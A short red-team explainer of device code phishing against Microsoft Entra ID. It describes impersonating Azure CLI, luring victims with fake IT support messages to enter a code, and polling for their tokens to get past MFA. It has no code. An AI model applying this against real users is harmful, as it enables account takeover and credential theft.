The Device Code Flow is a legitimate OAuth2 protocol originally designed for input-constrained devices like smart TVs or IoT endpoints. However, in the hands of a red teamer or adversary, it becomes an elegant and devastating MFA bypass tool. The core vulnerability lies in its decoupling of the authentication session from the token delivery. By convincing a victim to enter a short code on the official `microsoft.com/devicelogin` page, the victim satisfies all MFA and Conditional Access requirements from their trusted, compliant device. Meanwhile, the attacker's script—running on an untrusted machine—polls the token endpoint and is handed a pristine, fully validated Primary Refresh Token (PRT) equivalent. No passwords stolen, no MFA prompts fatigue—just pure session hijacking.
The attack begins by requesting a unique device code and a verification URL from the Entra ID tenant. The attacker deliberately impersonates a highly trusted, common application—such as the Azure CLI or Microsoft Graph PowerShell—to ensure the eventual consent prompt looks completely normal to the victim.
While the victim is socially engineered into entering the code (e.g., via an urgent IT support Teams message), the attacker's machine quietly polls the Entra ID token endpoint. The moment the victim approves the sign-in on their phone, the Entra backend hands the Access and Refresh tokens directly to the attacker's polling script. The perimeter is breached without a single alarm.